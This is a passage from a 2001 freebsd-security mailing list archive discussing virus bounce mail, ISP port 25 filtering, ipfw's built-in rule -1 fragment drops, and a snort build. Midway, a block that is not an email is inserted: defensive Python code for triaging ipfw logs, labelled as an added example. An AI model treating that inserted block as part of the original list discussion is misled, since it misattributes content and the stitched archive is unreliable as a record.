Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21])
	by mohegan.mohawk.net (8.9.3/8.9.3) with ESMTP id IAA06919;
	Wed, 14 Mar 2001 08:42:23 -0500 (EST)
	(envelope-from rjh@mohawk.net)
Date: Wed, 14 Mar 2001 08:42:23 -0500 (EST)
From: Ralph Huntington <rjh@mohawk.net>
To: "Bruce M. Walker" <bmw@borderware.com>
Cc: Jim Durham <durham@w2xo.pgh.pa.us>, freebsd-security@FreeBSD.ORG
Subject: Re: Sophos and Virus return mail
In-Reply-To: <200103141308.f2ED84E11909@fusion.borderware.com>
Message-ID: <Pine.BSF.4.21.0103140841480.4793-100000@mohegan.mohawk.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> (This is one case where blocking of port 25 by ISPs is a good thing.)

If port 25 is blocked, then how is legitimate mail accepted?  -=r=-





From owner-freebsd-security  Wed Mar 14  5:33:14 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mgateway.borderware.com (mgateway.borderware.com [207.236.65.231])
	by hub.freebsd.org (Postfix) with ESMTP id 83D6537B719
	for <freebsd-security@FreeBSD.ORG>; Wed, 14 Mar 2001 05:33:11 -0800 (PST)
	(envelope-from bmw@borderware.com)
From: "Bruce M. Walker" <bmw@borderware.com>
Message-Id: <200103141333.f2EDX0J19096@fusion.borderware.com>
Subject: Re: Sophos and Virus return mail
In-Reply-To: <Pine.BSF.4.21.0103140841480.4793-100000@mohegan.mohawk.net> from
 Ralph Huntington at "Mar 14, 2001 08:42:23 am"
To: Ralph Huntington <rjh@mohawk.net>
Date: Wed, 14 Mar 2001 08:33:00 -0500 (EST)
Cc: "Bruce M. Walker" <bmw@borderware.com>,
	Jim Durham <durham@w2xo.pgh.pa.us>, freebsd-security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL66 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Ralph Huntington wrote:
> > (This is one case where blocking of port 25 by ISPs is a good thing.)
> 
> If port 25 is blocked, then how is legitimate mail accepted?  -=r=-

[The instant I hit the "send" key, I knew I should have clarified! :-]

I meant, of course, blocking of port 25 to all destinations but the
"officially sanctioned mail server".  ISPs generally provide you
with a mail server IP which you are supposed to forward all mail
to.  Forcing all customers to go through that helps (a little) to
prevent spamming via open relays.  Yes, it annoys some, but clients
with dynamic addresses on DSL/cable modems usually don't care.

(Veering dangerously OT now...)

-bmw



From owner-freebsd-security  Wed Mar 14  6:27:57 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21])
	by hub.freebsd.org (Postfix) with ESMTP id 7EB7F37B718
	for <freebsd-security@FreeBSD.ORG>; Wed, 14 Mar 2001 06:27:55 -0800 (PST)
	(envelope-from rjh@mohawk.net)
Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21])
	by mohegan.mohawk.net (8.9.3/8.9.3) with ESMTP id JAA08446;
	Wed, 14 Mar 2001 09:42:54 -0500 (EST)
	(envelope-from rjh@mohawk.net)
Date: Wed, 14 Mar 2001 09:42:54 -0500 (EST)
From: Ralph Huntington <rjh@mohawk.net>
To: "Bruce M. Walker" <bmw@borderware.com>
Cc: Jim Durham <durham@w2xo.pgh.pa.us>, freebsd-security@FreeBSD.ORG
Subject: Re: Sophos and Virus return mail
In-Reply-To: <200103141333.f2EDX0J19096@fusion.borderware.com>
Message-ID: <Pine.BSF.4.21.0103140939550.4793-100000@mohegan.mohawk.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> > > (This is one case where blocking of port 25 by ISPs is a good thing.)
> > 
> > If port 25 is blocked, then how is legitimate mail accepted?  -=r=-
> 
> I meant, of course, blocking of port 25 to all destinations but the
> "officially sanctioned mail server".  ISPs generally provide you
> with a mail server IP which you are supposed to forward all mail
> to.  Forcing all customers to go through that helps (a little) to
> prevent spamming via open relays.  Yes, it annoys some, but clients
> with dynamic addresses on DSL/cable modems usually don't care.

Okay, so you meant blocking the 'escape' of packets bound for port 25 on
any machine *other*than* the approved smtp host, which, of course, does
not relay, correct?





From owner-freebsd-security  Wed Mar 14  6:59:34 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mgateway.borderware.com (mgateway.borderware.com [207.236.65.231])
	by hub.freebsd.org (Postfix) with ESMTP id 1947037B71B
	for <freebsd-security@FreeBSD.ORG>; Wed, 14 Mar 2001 06:59:30 -0800 (PST)
	(envelope-from bmw@borderware.com)
From: "Bruce M. Walker" <bmw@borderware.com>
Message-Id: <200103141459.f2EExFI21502@fusion.borderware.com>
Subject: Re: Sophos and Virus return mail
In-Reply-To: <Pine.BSF.4.21.0103140939550.4793-100000@mohegan.mohawk.net> from
 Ralph Huntington at "Mar 14, 2001 09:42:54 am"
To: Ralph Huntington <rjh@mohawk.net>
Date: Wed, 14 Mar 2001 09:59:15 -0500 (EST)
Cc: "Bruce M. Walker" <bmw@borderware.com>,
	Jim Durham <durham@w2xo.pgh.pa.us>, freebsd-security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL66 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Ralph Huntington wrote:
> > > If port 25 is blocked, then how is legitimate mail accepted?  -=r=-
> > 
> > I meant, of course, blocking of port 25 to all destinations but the
> > "officially sanctioned mail server".  ISPs generally provide you
> > with a mail server IP which you are supposed to forward all mail
> > to.
> 
> Okay, so you meant blocking the 'escape' of packets bound for port 25 on
> any machine *other*than* the approved smtp host, which, of course, does
> not relay, correct?

Not *quite*: the approved SMTP mail server *must* be able to relay,
otherwise you (the customer) wouldn't be able to address mail to
anybody other than people with addresses at your ISP.

Maybe the context isn't clear: I'm referring to blocking being done
by your ISP (i.e., your employer, your upstream provider, whatever).

This hypothetical ISP will filter packets destined for port 25 at
any IP-addr except for connections to, say, mail.big-isp.net, their
own mailserver.

Then they instruct you (the customer) that when you set up MS Lookout!
or Eudora, that you must specify mail.big-isp.net as the SMTP server.
Your mail client then forwards all outgoing mail to mail.big-isp.net,
and that server forwards your mail to the actual destination.

So mail.big-isp.net gets all the outgoing mail traffic from the
entire ISP's user community and forwards it to the addressees.
Nobody is allowed (in this gated community :-) to connect SMTP
directly from their Windoze box to the remote mailserver (or MX
host) of their addressee.

An example, I believe, is Mindspring who recently announced
that they would start blocking outgoing attempts to connect to
port 25.  The point is to stop spammers in their user community
from abusing open relays.

Now, how did this go from "Snowhite and the Empty Envelope-from"
to "Packet-filtering by the Big Bad Wolf"? :-)

-bmw



From owner-freebsd-security  Wed Mar 14  8: 6: 2 2001
Delivered-To: freebsd-security@freebsd.org
Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4])
	by hub.freebsd.org (Postfix) with ESMTP id 9606637B718
	for <security@FreeBSD.ORG>; Wed, 14 Mar 2001 08:05:58 -0800 (PST)
	(envelope-from freebsd@gndrsh.dnsmgr.net)
Received: (from freebsd@localhost)
	by gndrsh.dnsmgr.net (8.9.3/8.9.3) id IAA47316;
	Wed, 14 Mar 2001 08:05:25 -0800 (PST)
	(envelope-from freebsd)
From: "Rodney W. Grimes" <freebsd@gndrsh.dnsmgr.net>
Message-Id: <200103141605.IAA47316@gndrsh.dnsmgr.net>
Subject: Re: ipfw rule -1?
In-Reply-To: <20010313232014.B496@cjc-desktop.users.reflexcom.com> from "Crist J. Clark" at "Mar 13, 2001 11:20:14 pm"
To: cjclark@alum.mit.edu
Date: Wed, 14 Mar 2001 08:05:25 -0800 (PST)
Cc: alan@batie.org (Alan Batie), security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL54 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> On Tue, Mar 13, 2001 at 08:40:20AM -0800, Alan Batie wrote:
> > I'm seeing a few of these in my ipfw log and was wondering what rule -1 is?  
> > I couldn't find anything about it in the man page...
> > 
> > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
> > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
> > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
> > > ipfw: -1 Refuse TCP 62.29.124.91:97 199.2.210.241:29540 in via etha16
> > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
> 
> The manpage does not go as far as to indicate that this is rule -1,
> but it does say this happens,
> 
>   FINE POINTS
>        o   There is one kind of packet that the firewall will always discard,
>            that is a TCP packet's fragment with a fragment offset of one.  This
>            is a valid packet, but it only has one use, to try to circumvent
>            firewalls.
> 
> Rule -1 is given for any packet dropped, but not dropped due to a user
> rule or the default rule. A quick look at the source indicates the
> above pseudo-rule and some other fragment issues (bogusfrag) are the
> only such situations. 
> 
> OK, I've answered this one enough times now. Should I send in a PR
> with patch to the manpage or is this for the FAQ?

Patch the manpage, and the FAQ.  Specifically mention the rule number -1
as being a builtin unalterable set of rules, and describe exactly what those
rules are.


Thanks,
-- 
Rod Grimes - KD7CAX @ CN85sl - (RWG25)               rgrimes@gndrsh.dnsmgr.net



From owner-freebsd-security  Wed Mar 14  8:12:49 2001
Delivered-To: freebsd-security@freebsd.org
Received: from orestes.cs.brandeis.edu (orestes.cs.brandeis.edu [129.64.3.188])
	by hub.freebsd.org (Postfix) with ESMTP id 6481237B718
	for <security@FreeBSD.ORG>; Wed, 14 Mar 2001 08:12:45 -0800 (PST)
	(envelope-from meshko@orestes.cs.brandeis.edu)
Received: from localhost (meshko@localhost)
	by orestes.cs.brandeis.edu (8.9.3/8.9.3) with ESMTP id LAA03889;
	Wed, 14 Mar 2001 11:12:29 -0500
Date: Wed, 14 Mar 2001 11:12:29 -0500 (EST)
From: Mikhail Kruk <meshko@cs.brandeis.edu>
To: "Rodney W. Grimes" <freebsd@gndrsh.dnsmgr.net>
Cc: <cjclark@alum.mit.edu>, Alan Batie <alan@batie.org>,
	<security@FreeBSD.ORG>
Subject: Re: ipfw rule -1?
In-Reply-To: <200103141605.IAA47316@gndrsh.dnsmgr.net>
Message-ID: <Pine.LNX.4.30.0103141109190.2204-100000@orestes.cs.brandeis.edu>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> > Rule -1 is given for any packet dropped, but not dropped due to a user
> > rule or the default rule. A quick look at the source indicates the
> > above pseudo-rule and some other fragment issues (bogusfrag) are the
> > only such situations.
> >
> > OK, I've answered this one enough times now. Should I send in a PR
> > with patch to the manpage or is this for the FAQ?
>
> Patch the manpage, and the FAQ.  Specifically mention the rule number -1
> as being a builtin unalterable set of rules, and describe exactly what those
> rules are.

Looks like a docs thread, not a security one, but I'll stick in my 2 cents...
I don't think that something that is in a man page and can be easily found
in it without even reading the whole thing (search for -1?) belongs in the
FAQ. The FAQ is for problems which are not easily solved using man because
it's unclear where to look for the answer, IMHO.
I vote for man page only.

> Thanks,
> --
> Rod Grimes - KD7CAX @ CN85sl - (RWG25)               rgrimes@gndrsh.dnsmgr.net
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Mar 14  8:30:49 2001
Delivered-To: freebsd-security@freebsd.org
Received: from w2xo.pgh.pa.us (18.gibs5.xdsl.nauticom.net [209.195.184.19])
	by hub.freebsd.org (Postfix) with ESMTP id 7B0F237B719
	for <freebsd-security@FreeBSD.ORG>; Wed, 14 Mar 2001 08:30:40 -0800 (PST)
	(envelope-from durham@w2xo.pgh.pa.us)
Received: from shazam (shazam [192.168.5.3])
	by w2xo.pgh.pa.us (8.11.2/8.9.3) with ESMTP id f2EGTmq44176;
	Wed, 14 Mar 2001 16:29:52 GMT
	(envelope-from durham@w2xo.pgh.pa.us)
Date: Wed, 14 Mar 2001 11:31:05 -0500 (EST)
From: Jim Durham <durham@w2xo.pgh.pa.us>
X-Sender: durham@shazam.int
To: "Bruce M. Walker" <bmw@borderware.com>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Sophos and Virus return mail
In-Reply-To: <200103141308.f2ED84E11909@fusion.borderware.com>
Message-ID: <Pine.BSF.4.21.0103141119450.1452-100000@shazam.int>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org



On Wed, 14 Mar 2001, Bruce M. Walker wrote:

> Jim Durham wrote:
> > 
> > I thought of rewriting the script to use the "From: " address
> > to reply. I think that would usually work, but I'm not sure
> > that address always appears either.
> 
> Unhappily not:
> 
>   From: Hahaha <hahaha@sexyfun.net>
> 
> You can see the IP of the host that sent it to you in the Received:
> headers if you inspect them, but that will be simply the Windows
> PC that itself has been infected.  Snowhite contains a complete
> SMTP send-only implementation and it delivers to its targets directly.
> 
> I'm afraid you're stuck with these things.
> 
> (This is one case where blocking of port 25 by ISPs is a good thing.)
> 
> -bmw

Yes, SnowWhite is probably a bad example, as, like you say, it
doesn't generate a replyable "From:" address. I didn't ask
my question correctly. Some Viruses generate no envelope
"from" but *do* generate a "From: ". I was thinking about
the ramifications of changing the script to use the "From: "
if the envelope is not there.

SO...  

if (from)... reply to from

else if (From: ) reply to From:

else reply to MAILER-DAEMON  (sigh...)


Another thing that might be done is ... and I've done this by hand
a couple times, which gets old... dig out the "ppp-4027dialup@bigisp.net"
and the time from the headers and generate a reply to:
"abuse@bigisp.net". Giving the time of the abuse and the dialup.

Maybe if we started using 

Sadly, I don't think ISPs pay much attention to "abuse" e-mail, though.
(Another sigh). I've never gotten a response to an abuse report.

This "Virus in your mail to:" stuff gets old..

Yes, I knew what you meant about port 25.. no need to explain.
Brains are much faster than fingers..


Jim Durham



To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Mar 14  8:36:53 2001
Delivered-To: freebsd-security@freebsd.org
Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193])
	by hub.freebsd.org (Postfix) with ESMTP id 7C31537B71A
	for <freebsd-security@FreeBSD.ORG>; Wed, 14 Mar 2001 08:36:51 -0800 (PST)
	(envelope-from wollman@khavrinen.lcs.mit.edu)
Received: (from wollman@localhost)
	by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id LAA49036;
	Wed, 14 Mar 2001 11:36:37 -0500 (EST)
	(envelope-from wollman)
Date: Wed, 14 Mar 2001 11:36:37 -0500 (EST)
From: Garrett Wollman <wollman@khavrinen.lcs.mit.edu>
Message-Id: <200103141636.LAA49036@khavrinen.lcs.mit.edu>
To: Jim Durham <durham@w2xo.pgh.pa.us>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Sophos and Virus return mail
In-Reply-To: <Pine.BSF.4.21.0103141119450.1452-100000@shazam.int>
References: <200103141308.f2ED84E11909@fusion.borderware.com>
	<Pine.BSF.4.21.0103141119450.1452-100000@shazam.int>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

<<On Wed, 14 Mar 2001 11:31:05 -0500 (EST), Jim Durham <durham@w2xo.pgh.pa.us> said:

> if (from)... reply to from

> else if (From: ) reply to From:

> else reply to MAILER-DAEMON  (sigh...)

Better choice:

	send_notice_to(envelope_destination);
	drop_message();

-GAWollman

--
Garrett A. Wollman   | O Siem / We are all family / O Siem / We're all the same
wollman@lcs.mit.edu  | O Siem / The fires of freedom 
Opinions not those of| Dance in the burning flame
MIT, LCS, CRS, or NSA|                     - Susan Aglukark and Chad Irschick

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Mar 14  8:45:16 2001
Delivered-To: freebsd-security@freebsd.org
Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4])
	by hub.freebsd.org (Postfix) with ESMTP id 546D437B71A
	for <security@FreeBSD.ORG>; Wed, 14 Mar 2001 08:45:12 -0800 (PST)
	(envelope-from freebsd@gndrsh.dnsmgr.net)
Received: (from freebsd@localhost)
	by gndrsh.dnsmgr.net (8.9.3/8.9.3) id IAA47445;
	Wed, 14 Mar 2001 08:45:00 -0800 (PST)
	(envelope-from freebsd)
From: "Rodney W. Grimes" <freebsd@gndrsh.dnsmgr.net>
Message-Id: <200103141645.IAA47445@gndrsh.dnsmgr.net>
Subject: Re: ipfw rule -1?
In-Reply-To: <Pine.LNX.4.30.0103141109190.2204-100000@orestes.cs.brandeis.edu> from Mikhail Kruk at "Mar 14, 2001 11:12:29 am"
To: meshko@cs.brandeis.edu (Mikhail Kruk)
Date: Wed, 14 Mar 2001 08:45:00 -0800 (PST)
Cc: cjclark@alum.mit.edu, alan@batie.org (Alan Batie),
	security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL54 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> > > Rule -1 is given for any packet dropped, but not dropped due to a user
> > > rule or the default rule. A quick look at the source indicates the
> > > above pseudo-rule and some other fragment issues (bogusfrag) are the
> > > only such situations.
> > >
> > > OK, I've answered this one enough times now. Should I send in a PR
> > > with patch to the manpage or is this for the FAQ?
> >
> > Patch the manpage, and the FAQ.  Specifically mention the rule number -1
> > as being a builtin unalterable set of rules, and describe exactly what those
> > rules are.
> 
> Looks like a docs thread, not a security, but I'll stick my 2 cents...
> I don't think that something that is in a man page and can be easily found
> in it without even reading the whole thing (search for -1?) belongs to the
> FAQ. FAQ is for problems which are not easily solved using man because
> it's unclear where to look for the answer, IMHO.
> I vote for man page only.

90% of what is in the FAQ can be found in man pages.  If we apply your
reasoning to the FAQ we could reduce it to 1/10th its current size :-)

-- 
Rod Grimes - KD7CAX @ CN85sl - (RWG25)               rgrimes@gndrsh.dnsmgr.net

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Mar 14 12:16:48 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.gmx.net (pop.gmx.net [194.221.183.20])
	by hub.freebsd.org (Postfix) with SMTP id 899F137B71A
	for <freebsd-security@freebsd.org>; Wed, 14 Mar 2001 12:16:40 -0800 (PST)
	(envelope-from Gerhard.Sittig@gmx.net)
Received: (qmail 5833 invoked by uid 0); 14 Mar 2001 20:16:38 -0000
Received: from p3ee20a8c.dip.t-dialin.net (HELO speedy.gsinet) (62.226.10.140)
  by mail.gmx.net (mp022-rz3) with SMTP; 14 Mar 2001 20:16:38 -0000
Received: (from sittig@localhost)
	by speedy.gsinet (8.8.8/8.8.8) id TAA22480
	for freebsd-security@freebsd.org; Wed, 14 Mar 2001 19:18:31 +0100
Date: Wed, 14 Mar 2001 19:18:31 +0100
From: Gerhard Sittig <Gerhard.Sittig@gmx.net>
To: freebsd-security@freebsd.org
Subject: Re: ICMP attacks
Message-ID: <20010314191831.W20830@speedy.gsinet>
Mail-Followup-To: freebsd-security@freebsd.org
References: <980521178.3a7190da7ba07@mail.marketnews.com> <NEBBIEGPMLMKDBMMICFNAECNEMAA.mit@mitayai.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0i
In-Reply-To: <NEBBIEGPMLMKDBMMICFNAECNEMAA.mit@mitayai.net>; from mit@mitayai.net on Wed, Mar 14, 2001 at 02:29:17AM -0500
Organization: System Defenestrators Inc.
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, Mar 14, 2001 at 02:29 -0500, Will Mitayai Keeso Rowe wrote:
> 
> i'd love to use snort, but i keep getting this:
> 
> [castle:root]/usr/ports/security/snort# make -DWITH_MYSQL=yes clean install
> ===>  Cleaning for snort-1.7
> ===>  Extracting for snort-1.7
> >> Checksum OK for snort-1.7.tar.gz.
> 
> gzip: stdout: Broken pipe
> ===>  Patching for snort-1.7
> ===>  Configuring for snort-1.7
> 

This is only a problem *if* the configure / build steps fail,
too.  But if they do, you should cite _these_ messages.


virtually yours   82D1 9B9C 01DC 4FB4 D7B4  61BE 3F49 4F77 72DE DA76
Gerhard Sittig   true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
-- 
     If you don't understand or are scared by any of the above
             ask your parents or an adult to help you.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Mar 14 13:11: 0 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.ruhr.de (in-ruhr4.ruhr.de [212.23.134.2])
	by hub.freebsd.org (Postfix) with SMTP id D7C8937B71C
	for <security@FreeBSD.ORG>; Wed, 14 Mar 2001 13:10:56 -0800 (PST)
	(envelope-from ue@nathan.ruhr.de)
Received: (qmail 3421 invoked by uid 10); 14 Mar 2001 21:10:54 -0000
Received: (from ue@localhost)
	by nathan.ruhr.de (8.11.3/8.11.2) id f2EL6EL94714
	for security@FreeBSD.ORG; Wed, 14 Mar 2001 22:06:14 +0100 (CET)
	(envelope-from ue)
Date: Wed, 14 Mar 2001 22:06:14 +0100
From: Udo Erdelhoff <ue@nathan.ruhr.de>
To: security@FreeBSD.ORG
Subject: Re: ipfw rule -1?
Message-ID: <20010314220613.L83336@nathan.ruhr.de>
Mail-Followup-To: security@FreeBSD.ORG
References: <20010313084020.A5859@agora.rdrop.com> <20010313232014.B496@cjc-desktop.users.reflexcom.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010313232014.B496@cjc-desktop.users.reflexcom.com>; from cjclark@reflexnet.net on Tue, Mar 13, 2001 at 11:20:14PM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, Mar 13, 2001 at 11:20:14PM -0800, Crist J. Clark wrote:
> Rule -1 is given for any packet dropped, but not dropped due to a user
> rule or the default rule. A quick look at the source indicates the
> above pseudo-rule and some other fragment issues (bogusfrag) are the
> only such situations. 

Hmm, I have the following setup: A -current box mounts /usr/src5 and
/usr/obj5 via NFS from a RELENG_4 box. Doing "make installworld" fails
as soon as there's a fragmented NFS packet - the fragments are dropped
by rule -1.

I switched to a kernel without ipfw to be able to complete the installworld.
The kernel was PRE_SMPNG. Were there any bugfixes in this area or should
I try to reproduce the problem with a current -current?

/s/Udo
-- 
I figure that if the burned hand teaches best,
then the entire scorched epidermis simply has to get its point across.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
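The rule-number classification quoted above (rule -1 for packets dropped by the kernel's built-in fragment checks rather than by any rule, 65535 for the default rule) is what you need when triaging ipfw logs: a -1 entry cannot be explained by reading the ruleset. The following is an added example, not code from this thread or from FreeBSD; the sample log lines are constructed in the shape of ipfw syslog entries, and the exact field layout is an assumption that may differ between releases, so the pattern is deliberately loose.

```python
import re
from collections import Counter

# Constructed sample in the shape of FreeBSD ipfw syslog output (not a real
# capture; the field layout is an assumption and may differ between releases).
SAMPLE_LOG = """\
Mar 13 08:40:20 gw /kernel: ipfw: 100 Deny TCP 10.0.0.5:3421 192.0.2.10:23 in via fxp0
Mar 13 08:40:21 gw /kernel: ipfw: 65535 Deny UDP 10.0.0.9:137 192.0.2.255:137 in via fxp0
Mar 13 08:40:22 gw /kernel: ipfw: -1 Refuse TCP 192.0.2.77:0 10.0.0.2:0 in via fxp0 Fragment = 5
Mar 13 08:40:23 gw /kernel: ipfw: -1 Refuse UDP 192.0.2.40:0 10.0.0.2:0 in via fxp0 Fragment = 1
Mar 13 08:40:24 gw /kernel: ipfw: -1 Refuse TCP 192.0.2.77:0 10.0.0.2:0 in via fxp0 Fragment = 3
Mar 13 08:40:25 gw /kernel: ipfw: 200 Accept TCP 10.0.0.5:4001 192.0.2.10:80 out via fxp0
"""

LINE_RE = re.compile(
    r"ipfw:\s+(?P<rule>-?\d+)\s+(?P<action>\w+)\s+(?P<proto>\w+)\s+"
    r"(?P<src>\S+)\s+(?P<dst>\S+)\s+(?P<direction>in|out)\s+via\s+(?P<ifc>\S+)"
    r"(?:\s+Fragment\s*=\s*(?P<frag>\d+))?"
)

BUILTIN_RULE = -1      # kernel's built-in sanity checks; no ipfw(8) rule can change them
DEFAULT_RULE = 65535   # the default rule at the end of every ruleset


def parse_line(line):
    """Return a dict for one ipfw log line, or None if the line is not one."""
    m = LINE_RE.search(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["rule"] = int(rec["rule"])
    rec["frag"] = int(rec["frag"]) if rec["frag"] is not None else None
    rec["src_host"] = rec["src"].rsplit(":", 1)[0]
    return rec


def classify(rule):
    """Which part of the firewall made the decision."""
    if rule == BUILTIN_RULE:
        return "builtin"
    if rule == DEFAULT_RULE:
        return "default"
    return "user"


def triage(log_text):
    """Count log lines per decision source and keep the built-in (-1) entries."""
    counts = Counter()
    builtin = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        counts[classify(rec["rule"])] += 1
        if rec["rule"] == BUILTIN_RULE:
            builtin.append(rec)
    return {"counts": counts, "builtin": builtin}


def builtin_drop_sources(log_text):
    """Source hosts behind rule -1 entries, most frequent first.

    Repeated rule -1 hits with non-zero fragment offsets from one host are
    what a fragment-based evasion attempt looks like; a single legitimate
    peer (an NFS server, say) showing up here points at a fragment-handling
    problem rather than an attack."""
    result = triage(log_text)
    return Counter(rec["src_host"] for rec in result["builtin"]).most_common()
```

Run `triage(open("/var/log/security").read())` on a real log and look at `counts["builtin"]` separately from the user-rule counts; the built-in drops are the ones that no `ipfw list` output will explain.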


From owner-freebsd-security  Wed Mar 14 14:14:47 2001
Delivered-To: freebsd-security@freebsd.org
Received: from sol.cc.u-szeged.hu (sol.cc.u-szeged.hu [160.114.8.24])
	by hub.freebsd.org (Postfix) with ESMTP id 154C737B718
	for <freebsd-security@freebsd.org>; Wed, 14 Mar 2001 14:14:44 -0800 (PST)
	(envelope-from sziszi@petra.hos.u-szeged.hu)
Received: from petra.hos.u-szeged.hu by sol.cc.u-szeged.hu (8.9.3+Sun/SMI-SVR4)
	id XAA02100; Wed, 14 Mar 2001 23:14:42 +0100 (MET)
Received: from sziszi by petra.hos.u-szeged.hu with local (Exim 3.12 #1 (Debian))
	id 14dJXW-0004EX-00
	for <freebsd-security@FreeBSD.ORG>; Wed, 14 Mar 2001 23:14:42 +0100
Date: Wed, 14 Mar 2001 23:14:42 +0100
From: Szilveszter Adam <sziszi@petra.hos.u-szeged.hu>
To: freebsd-security@FreeBSD.ORG
Subject: Re: Sophos and Virus return mail
Message-ID: <20010314231442.F12391@petra.hos.u-szeged.hu>
Mail-Followup-To: Szilveszter Adam <sziszi@petra.hos.u-szeged.hu>,
	freebsd-security@FreeBSD.ORG
References: <Pine.BSF.4.21.0103140841480.4793-100000@mohegan.mohawk.net> <200103141333.f2EDX0J19096@fusion.borderware.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200103141333.f2EDX0J19096@fusion.borderware.com>; from bmw@borderware.com on Wed, Mar 14, 2001 at 08:33:00AM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> Ralph Huntington wrote:
> > > (This is one case where blocking of port 25 by ISPs is a good thing.)

Yes. And makes using eg send-pr(1) real fun(TM). Enjoying all the benefits
of such a setup right now. While we are at it, why not firewall off the
whole Net by just allowing a few things through proxies like www and ftp
just so that a few morons are safe? Anyways, who would use such esoteric
things as "cvsps" or "cvsup" and what are these etc. You can see where this
is leading. Unfortunately network administration only looks simple if you
are the one sitting at the admin console. Otherwise, it can quickly become
a set of annoying limitations that hinder you @work or @play. Cool. I
really feel like paying a lot for Internet access with these conditions.

In the meantime, I guess most virus infections are due to the fact that
(l)users go to really great lengths to open anything that says "Big
tits inside" or "Check out this nice music." Today, it's email. Tomorrow,
it will likely be mobile devices. The day after tomorrow... who knows?

Sorry for the OT, but I really felt I needed to tell this some time... not
all FreeBSD/UNIX aficionados are sysops at the same time, much less
network ops at their place.
 
-- 
Regards:

Szilveszter ADAM
Szeged University
Szeged Hungary

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Mar 14 15:47:58 2001
Delivered-To: freebsd-security@freebsd.org
Received: from daedalus.cs.brandeis.edu (daedalus.cs.brandeis.edu [129.64.3.179])
	by hub.freebsd.org (Postfix) with ESMTP id 314E737B77B
	for <freebsd-security@FreeBSD.ORG>; Wed, 14 Mar 2001 15:47:51 -0800 (PST)
	(envelope-from meshko@daedalus.cs.brandeis.edu)
Received: from localhost (meshko@localhost)
